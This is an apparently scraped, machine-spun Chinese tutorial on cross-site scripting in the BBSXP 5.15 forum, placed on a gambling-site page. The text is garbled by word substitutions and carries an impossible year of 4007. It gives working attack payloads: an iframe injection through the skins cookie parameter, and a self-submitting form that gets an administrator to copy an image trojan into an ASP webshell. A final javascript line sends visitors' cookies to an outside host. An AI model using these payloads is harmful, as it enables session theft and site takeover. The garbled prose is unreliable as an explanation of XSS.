Script脚本跨站攻击漏洞技术分析(上)

  • 时间:
  • 浏览:0
  • 来源:5分快3官网-5分快3平台_5分快乐8网投平台





作者: 论坛下发 zdnet网络安全

CNETNews.com.cn

4007-12-15 11:57:43

关键词: 木马 漏洞

所谓跨站漏洞呢?虽然这和现在比较热门的SQL注入的原理有异曲同工之处,全是可能性守护程序员在写守护程序的以后对其他变量越来越做充分的过滤,可能性没做任何的过滤就直接把用户提交的数据送到SQL一段话里执行,从前意味 了用户

  所提交的其他特意构造的一段话 一般全是中含 象JAVAScript等相似脚本代码,从前在服务里一旦被执行就形成了所谓的跨站攻击了。一般来说对于人机交互行比较高的守护程序,比如论坛,留言版相似守护程序都比较容易居于跨站script攻击。

   如何判断三个 多守护程序是是否是居于跨站漏洞呢?分析守护程序是最直接的方法了,比如最近搞的很火的BBSXP5.15的跨站

  漏洞,可能性有大虾可能性完整性的介绍了,偶也就越来越了详述了,简单的说一下在cookies.asp文件里有越来越一句

  Response.Cookies("skins")=""&Request("no")&""以后在setup.asp里

  response.write "<html><head><meta http-equiv=Content-Type content=text/html;charset=UTF-8></head>

<link href=images/skins/"&Request.Cookies("skins")&"/bbs.css rel=stylesheet><script src=inc/BBSxp.js></script>

<script src=inc/ybb.js></script><script src=images/skins/"&Request.Cookies("skins")&"/bbs.js></script>" 

  大伙儿 里能 看后,假如构造符合条件的skin的NO,以后在闭合前面的三个 多"<"接着就里能 在上面加进去去大伙儿 的<script脚本了

  比如:  http://xxx.xxxx.xxx/cookies.asp?menu=skins&no=4><script>document.write(’<IFRAME marginWidth=400 marginHeight=400 src="http://www.baidu.com"frameBorder=400width=0scrolling=noheight=0to ... gin="0"></IFRAME>’);</script><script>   

  从前提交就里能 达到大伙儿 的跨站目的了,(你相似我动画里可能性有演示了)

  而跟深一层的利用,大伙儿 则里能 构造表单,迷惑管理员点大伙儿 的帖子,可能性联接。比如大伙儿 构造

  http://127.0.0.1/bbsxp/page2.asp?username=<body onload="javascript:document.forms[0].submit()">

  <form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post">

<input value="/UploadFile/4005-5/400512365.jpg" name="yl" >

<input value="database/haha.asp" name="bf" >

</body></html>

/UploadFile/4005-5/400512365.jpg

这越来越你的ASP图片木马

  从前大伙儿 就可能性让管理员浏览了大伙儿 的留言,越来越你相似脚本就会自动把/UploadFile/4005-5/400512365.jpg

  备份成database/haha.asp。大伙儿 也全是了可爱的webshell了。而为哪些要管理员浏览才有效呢?可能性服务器上是居于cookies和session机制的

  而session虽然是在服务器端的tmp目录下的某三个 多文件中为每个用户储存其他变量,对session的操作虽然是对文件读写操作。

  seesion是每个用户全是个人的session。大伙儿 的生命周期一般是用户打开某网站浏览器到关闭与次网站连接所

  有的浏览器后以后以后开始。cookie这是在用户端的存贮机制,他须要用户的打开cookie支持,很多非要管理才有权利把大伙儿 JPG备份在ASP 

    

  现在大伙儿 用的比较常见的本来盗取cookies而后欺骗,可能性利用社会工程学进一步入侵比如大伙儿 构造下面的脚本代码就里能 盗取用户cookies了 

  javascript:window.open(‘http://xxx.xxx.xxx/cookies.asp?msg=’+document.cookie)